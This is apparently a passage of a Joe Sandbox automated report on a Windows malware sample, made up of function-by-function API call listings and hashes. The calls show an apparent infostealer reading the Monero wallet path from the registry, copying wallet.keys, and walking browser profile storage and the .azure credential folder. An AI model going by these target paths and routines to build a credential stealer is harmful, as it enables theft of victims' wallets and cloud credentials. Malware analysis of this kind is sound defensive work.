                            • Opcode Fuzzy Hash: 3371783e097aff10c0ff8af8ec0042e5eb53450c7d6b8713459ee23cb3bb1740
                            • Instruction Fuzzy Hash: 9251A1F2A0C6009FE704AF2AE88177EF7E6EB94320F16892DD6C587744E63548458A97
                            Function 00A2B9A6 Relevance: .1, Instructions: 149COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f25a9967e72621efd03a5a46aeaef6d1f633b1edfd41d875dfa4037da42d45e0
                            • Instruction ID: f8c3991ef59ead82d5885ce4cbaee5d4c3e0bcb8b6333488b141304434e6a0c5
                            • Opcode Fuzzy Hash: f25a9967e72621efd03a5a46aeaef6d1f633b1edfd41d875dfa4037da42d45e0
                            • Instruction Fuzzy Hash: 3F4123F3E186005BF34CDA39DD5536A72C6DBD4311F2B863CAB89977C8EC795801428A
                            Function 006E85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E8636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 006E86AA
                            • StrStrA.SHLWAPI(?,0101F2E0), ref: 006E86CF
                            • lstrcpyn.KERNEL32(009093D0,?,00000000), ref: 006E86EE
                            • lstrlen.KERNEL32(?), ref: 006E8701
                            • wsprintfA.USER32 ref: 006E8711
                            • lstrcpy.KERNEL32(?,?), ref: 006E8727
                            • StrStrA.SHLWAPI(?,0101F3D0), ref: 006E8754
                            • lstrcpy.KERNEL32(?,009093D0), ref: 006E87B4
                            • StrStrA.SHLWAPI(?,0101F160), ref: 006E87E1
                            • lstrcpyn.KERNEL32(009093D0,?,00000000), ref: 006E8800
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 6889fcddf4a8d2dd73eb2e54e8df9961e6866bb3dfaa6b046a279bce19c7777f
                            • Instruction ID: 11cc69703eb2cf09a04f7541866ad8c205a3a23ff1b94b598cb479569c15337b
                            • Opcode Fuzzy Hash: 6889fcddf4a8d2dd73eb2e54e8df9961e6866bb3dfaa6b046a279bce19c7777f
                            • Instruction Fuzzy Hash: 80F16D72A19215AFDB10DB74DD48ADB77BAEF88300F144559EA49E3351DF30AE01DBA0
                            Function 006D1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1F9F
                            • lstrlen.KERNEL32(010188F8), ref: 006D1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1FE3
                            • lstrlen.KERNEL32(00701794), ref: 006D1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D200E
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D204D
                            • lstrlen.KERNEL32(00701794), ref: 006D2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2075
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D2081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D20AC
                            • lstrlen.KERNEL32(?), ref: 006D20E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2104
                            • lstrcat.KERNEL32(00000000,?), ref: 006D2112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2139
                            • lstrlen.KERNEL32(00701794), ref: 006D214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D216B
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D2177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D21A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D21D4
                            • lstrlen.KERNEL32(?), ref: 006D21EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D220A
                            • lstrcat.KERNEL32(00000000,?), ref: 006D2218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2242
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D227F
                            • lstrlen.KERNEL32(0101DE28), ref: 006D228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D22B1
                            • lstrcat.KERNEL32(00000000,0101DE28), ref: 006D22B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D22F7
                            • lstrcat.KERNEL32(00000000), ref: 006D2304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006D2356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D23BF
                            • DeleteFileA.KERNEL32(00000000), ref: 006D23F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006D2444
                            • FindClose.KERNEL32(00000000), ref: 006D2453
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: 0803f39c9efbe3171160ee9e8060154d488750df4b39fcb610fc08b802be4797
                            • Instruction ID: e1fea756f717ebe1f0b1f859dcb4eccdba34e647e2ae6b91b308424d5186d550
                            • Opcode Fuzzy Hash: 0803f39c9efbe3171160ee9e8060154d488750df4b39fcb610fc08b802be4797
                            • Instruction Fuzzy Hash: B0E17D70E2121B9FCB61EF65DDA9AEE77BAAF24300F04502AF905A7311DB34DD058B94
                            Function 006E6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6445
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006E64AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E64E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6537
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: 672e83898708f9d6bf00be3cf20d9f8e42cc5321b8b317989e8d80cc5f1e31ca
                            • Instruction ID: f45c2f51a8b7e3f28129826e9406f239e27cc7037574173bf6a6798826c7a185
                            • Opcode Fuzzy Hash: 672e83898708f9d6bf00be3cf20d9f8e42cc5321b8b317989e8d80cc5f1e31ca
                            • Instruction Fuzzy Hash: 3FF1CF70E223569FCB61EF6AD859AAE77B6AF20340F048029F845DB361DB34DC41CB94
                            Function 006E4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E43A3
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E43D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E43FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4409
                            • lstrlen.KERNEL32(\storage\default\), ref: 006E4414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 006E443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4498
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E44D7
                            • lstrcat.KERNEL32(00000000,?), ref: 006E44DF
                            • lstrlen.KERNEL32(00701794), ref: 006E44EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4507
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E4513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 006E451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 006E4547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E45A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006E45A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4601
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E462A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E4653
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E467B
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E46AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: fdb790b6de6f7cf4402e51f4befe699e374b13cbbb0e593fc482b5bffd59537a
                            • Instruction ID: a87bbecfc75ad2bf0df81cf8b56a3a0a23a9a913cc868d9bed42e0f6b2cdb59a
                            • Opcode Fuzzy Hash: fdb790b6de6f7cf4402e51f4befe699e374b13cbbb0e593fc482b5bffd59537a
                            • Instruction Fuzzy Hash: F0B18970A222569FCB61EF7AD959AAE77AAAF10300F045129B846E7352DF34DC018B94
                            Function 006E57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E57D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006E5804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E5868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E58C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E58D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E58F8
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E5961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5988
                            • lstrlen.KERNEL32(00701794), ref: 006E599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E59B9
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E59C5
                            • lstrlen.KERNEL32(0101DC48), ref: 006E59D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E59F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E5A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006E5A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5BB5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E5BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E5C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E5C70
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: b1c196c96a3e111257c0aea7fbdfd3da287e5ed9feb6e7eb234264d0bc2ae9e0
                            • Instruction ID: 3a6c2f0dbb026b18ae26d5f80bd814fd647e577c14103a76d9842cd9125125ae
                            • Opcode Fuzzy Hash: b1c196c96a3e111257c0aea7fbdfd3da287e5ed9feb6e7eb234264d0bc2ae9e0
                            • Instruction Fuzzy Hash: 2C02DE70E1275A9FCB61EF6AC899AEE7BBAAF14304F144129F80697351DB30DC41CB94
                            Function 006D1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006D1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D1135
                              • Part of subcall function 006D1120: RtlAllocateHeap.NTDLL(00000000), ref: 006D113C
                              • Part of subcall function 006D1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006D1159
                              • Part of subcall function 006D1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006D1173
                              • Part of subcall function 006D1120: RegCloseKey.ADVAPI32(?), ref: 006D117D
                            • lstrcat.KERNEL32(?,00000000), ref: 006D11C0
                            • lstrlen.KERNEL32(?), ref: 006D11CD
                            • lstrcat.KERNEL32(?,.keys), ref: 006D11E8
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D121F
                            • lstrlen.KERNEL32(010188F8), ref: 006D122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1251
                            • lstrcat.KERNEL32(00000000,010188F8), ref: 006D1259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 006D1264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 006D1294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12BA
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D12FF
                            • lstrlen.KERNEL32(0101DE28), ref: 006D130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1335
                            • lstrcat.KERNEL32(00000000,?), ref: 006D133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1378
                            • lstrcat.KERNEL32(00000000), ref: 006D1385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D13AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006D13D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1401
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D143D
                              • Part of subcall function 006EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006EEE12
                            • DeleteFileA.KERNEL32(?), ref: 006D1471
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 47701ffa09054b7cbaee240e9a095c015be7bee734ec0827a2f6e27701791163
                            • Instruction ID: 3425989456cfea191fdf73a808b08ce188aeffbfc268e5f6612a0d98380472b7
                            • Opcode Fuzzy Hash: 47701ffa09054b7cbaee240e9a095c015be7bee734ec0827a2f6e27701791163
                            • Instruction Fuzzy Hash: ACA1B271E10216ABCB61EFB5DC99AEE77BAAF15300F04402AF905EB351DB70DE418B94
                            Function 006EE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 006EE740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006EE769
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE79F
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 006EE7C6
                            • memset.MSVCRT ref: 006EE805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006EE82D
